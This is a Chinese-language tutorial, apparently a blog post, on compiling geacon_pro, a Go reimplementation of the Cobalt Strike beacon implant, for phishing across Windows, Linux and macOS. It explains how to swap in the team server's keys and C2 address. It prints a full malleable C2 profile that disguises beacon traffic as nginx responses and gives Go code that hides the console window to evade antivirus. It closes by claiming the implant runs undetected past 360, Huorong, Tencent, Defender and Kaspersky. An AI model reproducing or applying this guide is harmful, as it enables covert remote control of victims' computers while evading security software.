開源基于go重寫的beacon

請遵守法律法規，文章旨在提高安全軟體的應變政策，嚴禁非法使用。

0x01 項目簡介

基于go重寫beacon，基于go重寫的優勢是可編譯windows下、linux下、mac下的cs馬，友善跨平台釣魚或上線cs，劣勢是編譯後的大小約5M多

項目位址：https://github.com/H4de5-7/geacon_pro

0x02 編譯過程

需要修改3個地方，一個是cs服務端的公鑰私鑰，另一個是cs監聽器的位址及端口，最後是profile檔案

cs服務端的公鑰私鑰存儲于檔案.cobaltstrike.beacon_keys，需要編寫工具來提取，可參考項目geacon或者使用我編譯好的工具BeaconTool.jar

将提取後的公鑰私鑰替換config.go中的公鑰私鑰，同時替換config.go中的C2位址

使用作者提供的profile會報錯，需做一些修改，修改後如下

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95

# default sleep time is 60s set sleeptime "3000"; https-certificate { set C "KZ"; set CN "foren.zik"; set O "NN Fern Sub"; set OU "NN Fern"; set ST "KZ"; set validity "365"; } # define indicators for an HTTP GET http-get { set uri "/www/handle/doc"; client { #header "Host" "aliyun.com"; # base64 encode session metadata and store it in the Cookie header. metadata { base64url; prepend "SESSIONID="; header "Cookie"; } } server { # server should send output with no changes #header "Content-Type" "application/octet-stream"; header "Server" "nginx/1.10.3 (Ubuntu)"; header "Content-Type" "application/octet-stream"; header "Connection" "keep-alive"; header "Vary" "Accept"; header "Pragma" "public"; header "Expires" "0"; header "Cache-Control" "must-revalidate, post-check=0, pre-check=0"; output { mask; netbios; prepend "data="; append "%%"; print; } } } # define indicators for an HTTP http-post { # Same as above, Beacon will randomly choose from this pool of URIs [if multiple URIs are provided] set uri "/IMXo"; client { #header "Content-Type" "application/octet-stream"; # transmit our session identifier as /submit.php?id=[identifier] id { mask; netbiosu; prepend "user="; append "%%"; header "User"; } # post our output with no real changes output { mask; base64url; prepend "data="; append "%%"; print; } } # The server's response to our HTTP POST server { header "Server" "nginx/1.10.3 (Ubuntu)"; header "Content-Type" "application/octet-stream"; header "Connection" "keep-alive"; header "Vary" "Accept"; header "Pragma" "public"; header "Expires" "0"; header "Cache-Control" "must-revalidate, post-check=0, pre-check=0"; # this will just print an empty string, meh... output { mask; netbios; prepend "data="; append "%%"; print; } } }

編譯前需要安裝缺少的庫，go庫被牆不能直接通路，需配置中國鏡像，或其他方式

0x03 代碼修改

任何開源的免殺項目，時間一長都會不再免殺，我們要想它免殺的時間長一些，需要自己改一改代碼，作者在readme中提到，windows編譯時添加-ldflags “-H windowsgui -s -w”減小程式體積并取消黑框，這個取消黑框的選項通常會被殺軟捕獲，我們這裡改用代碼實作取消黑框

1 2 3 4 5 6 7 8 9 10

func HideWindow() { console := w32.GetConsoleWindow() if console == 0 { return // no console attached } _, consoleProcID := w32.GetWindowThreadProcessId(console) if w32.GetCurrentProcessId() == consoleProcID { w32.ShowWindowAsync(console, w32.SW_HIDE) } }

添加如下代碼，并在main中調用HideWindow()，然後編譯時不需要指定選項-H windowsgui，通讀代碼後，還可以修改其他部分，可自由發揮

0x04 效果展示

360衛士（核晶）、360殺毒、火絨、騰訊電腦管家

Defender

卡巴斯基免費版

均可上線